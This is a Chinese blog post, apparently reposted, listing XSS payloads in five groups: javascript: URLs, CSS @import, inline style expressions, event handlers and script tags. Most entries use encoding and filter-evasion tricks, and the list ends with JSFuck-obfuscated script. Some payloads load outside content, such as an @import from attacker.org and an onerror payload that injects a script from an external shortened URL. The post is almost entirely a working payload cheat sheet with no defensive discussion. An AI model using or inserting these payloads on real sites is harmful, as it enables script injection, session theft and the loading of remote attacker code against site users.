zoukankan html css js c++ java
XSS payload 大全

收集的一些XSS payload，主要分为五大类，便于查阅。
#第一类：Javascript URL
<a href="javascript:alert('test')">link</a>
<a href="java&#115;cript:alert('xss')">link</a>
<a href='vbscript:MsgBox("XSS")'>link</a>
<a href="vbscript:alert(1)">Hello</a>
<a href="vbscript&#058;alert(1)">Hello</a>
<a href=javascript:alert(&quot;XSS&quot;)>link</a>
<a href=`javascript:alert("RSnake says,'XSS'")`>link</a>
<a href=javascript:alert(String.fromCharCode(88,83,83))>link</a>
<a href="javascript&colon;alert(1)">link</a>
<a href="javaSCRIPT&colon;alert(1)">Hello</a>
<a href="javasc&NewLine;ript&colon;alert(1)">link</a> 
<a href="javas&Tab;cript:u0061lert(1);">Hello</a>
<a href="jav    ascript:alert('XSS')">link</a>
<a href="jav&#x09;ascript:alert('XSS')">link</a>
<a href="jav&#x0D;ascript:alert('XSS')">link</a>
<a href=" &#14;  javascript:alert('XSS');">link</a>
<a href="javascript:u0061lert&#x28;1&#x29">Hello</a>
<a href="javascript:confirm`1`">link</a>
<a href="javascript:confirm(1)">link</a>
<a href="j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)">1</a>
<a href="javascript:%61%6c%65%72%74%28%31%29">link</a>
<a href="javascript:u0061u006Cu0065u0072u0074(1)">link</a>
<a href=javascript:eval("x61x6cx65x72x74x28x27x78x73x73x27x29")>2</a>
<a href=javascript:eval("&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;")>link</a>  
<a href=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>link</a>
<a href=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>link</a>
<a href=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>link</a>
<a href="data:text/html;base64,amF2YXNjcmlwdDphbGVydCgxKQ==">test</a> 
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+>1</a>
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">


#第二类：CSS import
<style>@import url("http://attacker.org/malicious.css");</style>
<style>@import url("http://attacker.org/malicious.css");</style>
<STYLE>@import'javasc
ipt:alert("XSS")';</STYLE>
<STYLE>@import'http://jb51.net/xss.css';</STYLE>


#第三类：Inline style
<div style="color: expression(alert('XSS'))">
<div style=color:expression(alert(1))></div> 
<div style="color: '<'; color: expression(alert('XSS'))">
<div style=X:expression(alert(/xss/))>
<div style="x:65787072657373696f6e(alert(1))">
<div style="x:00065000780007000072000650007300073000690006f0006e(alert(1))">
<div style="x:65787072657373696f6e28 alert 28 1 29 29">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<div style="z:exp/*anything*/res/*here*/sion(alert(1))">
<div style=xss:expr/*XSS*/ession(alert('XSS'))>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.baidu.com")> 
<img STYLE="background-image:url(javascript:alert('XSS'))"> //ie6  
<img STYLE="background-image:75726c286a6176617363726970743a616c6572742827585353272929"> 
<A STYLE='noxss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>


#第四类：JavaScript 事件
<div onclick="alert('xss')">
<div onmouseenter="alert('xss')">
<div onclick ="alert('xss')">
<BODY ONLOAD=alert('XSS')>
<img src=1 onerror=alert(1)>
<img/src='1'/onerror=alert(0)>
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<img src="1" onerror=eval("x61x6cx65x72x74x28x27x78x73x73x27x29")></img>
<img src=1 onmouseover=alert('xss') a1=1111> 
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://t.cn/R5UpyOt';>
<a href="#" onclick=alert('170163163')>test</a>
<a href="#" onclick="u0061u006Cu0065u0072u0074(1)">link</a>
<a href="#" onclick="u0061u006Cu0065u0072u0074`a`">link</a>
<a href="#" onclick="alert(&#039;xss&#039;)">link</a>
<marquee onscroll=alert(1)> test</marquee>
<div  style="100px;height:100px;overflow:scroll" onscroll="alert('a')">123456 <br/><br/><br/><br/><br/></div>
<DIV onmousewheel="alert('a')" >123456</DIV><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
<div style="background-color:red" onmouseenter="alert('a')">123456</div>
<DIV onmouseleave="alert('1')">123456</DIV>
<div contentEditable="true" style="background-color:red" onfocusin="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red" onfocusout="alert('bem')" >asdf</div>
<marquee onstart="alert('a')" >asdf</marquee>
<div style="background-color:red;" onbeforecopy="alert('a')" >asdf</div>
<div style="background-color:red;" onbeforecut="alert('a')" >asdf</div>
<div style="background-color:red;" contentEditable="true" onbeforeeditfocus="alert('a')" >asdf</div>
<div style="background-color:red;" ="true" onbeforepaste="alert('a')" >asdf</div>
<div style="background-color:red;" oncontextmenu="alert('a')" >asdf</div>
<div style="background-color:red;" oncopy="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" oncut="alert('a')" >asdf</div>
<div style="background-color:red;" ondrag="alert('1')" >asdf</div>
<div style="background-color:red;" ondragend="alert('a')" >asdf</div>
<div style="background-color:red;" ondragenter="alert('b')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragleave="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragover="alert('b')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragstart="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondrop="alert('b')" >asdf</div> <div contentEditable="true" style="background-color:green;" ondrop="alert('bem')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onlosecapture="alert('b')">asdf</div>
<div contentEditable="true" style="background-color:red;" onpaste="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onselectstart="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onhelp="alert('a')" >asdf</div>
<div STYLE="background-color:red;behavior:url('#default#time2')" onEnd="alert('a')">asdf</div>
<div STYLE="background-color:red;behavior:url('#default#time2')" onBegin="alert('a')">asdf</div>
<div contentEditable="true" STYLE="background-color:red;" onactivate="alert('b')">asdf</div>
<div contentEditable="true" STYLE="background-color:red;filter: Alpha(opacity=100, style=2);"onfilterchange="alert('b')">asdf</div>
<div contentEditable="true" onbeforeactivate="alert('b')">asdf</div>
<div contentEditable="true" onbeforedeactivate="alert('a')">asdf</div>
<div contentEditable="true" ondeactivate="alert('bem')">asdf</div>
<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />
<audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)">
<audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)"></audio>
<body onscroll=alert(26)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<input type="hidden" accesskey="X" onclick="alert(/xss/)">


#第五类：Script 标签
<script src="http://baidu.com"></script>
<script>alert("XSS")</script>
<scr<script>ipt>alert("XSS")</scr<script>ipt>
<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
<script>alert(/1/.source)</script>
<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm(1);</script>
<script>alert(/88199/)</script>
<script>alert(`a`)</script>
<script>alert('a')</script>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<script>eval(alert(1))</script>
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 50, 51, 41))</script>
<script>eval("u0061u006cu0065u0072u0074u0028u0022u0078u0073u0073u0022u0029")</script>
<script>eval('x61x6cx65x72x74x28x27x78x73x73x27x29')</script>
<script>setTimeout('x61x6cx65x72x74x28x27x78x73x73x27x29')</script>
<script>setTimeout(alert(1),0)</script>
<script>setTimeout`alertx28x27 xss x27x29`</script>
<script>setInterval('x61x6cx65x72x74x28x27x78x73x73x27x29')</script>

<script src=data:text/javascript,alert(1)></script>
<script src=&#100&#97&#116&#97:text/javascript,alert(1)></script>

<script>u0061u006Cu0065u0072u0074(123)</script>
<script>u0061u006Cu0065u0072u0074(1)</script>
<script>u0061u006Cu0065u0072u0074`a`</script>
<script>window['alert'](0)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
<script>top['alert'](3)</script>
<!--[if]><script>alert(1)</script     -->

<script>alert("xss");;;;;;;;;;;;;;;;;    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script>
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+""")())();</script>
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
关于我：一个网络安全爱好者，致力于分享原创高质量干货，欢迎关注我的个人微信公众号：Bypass--，浏览更多精彩文章。
查看全文
相关阅读:
rest framework 认证权限频率
 rest framework 视图，路由
 rest framework 序列化
 10.3 Vue 路由系统
 10.4 Vue 父子传值
 10.2 Vue 环境安装
 10.1 ES6 的新增特性以及简单语法
 Django 跨域请求处理
 20190827 On Java8 第十四章流式编程
 20190825 On Java8 第十三章函数式编程
原文地址：https://www.cnblogs.com/xiaozi/p/7268506.html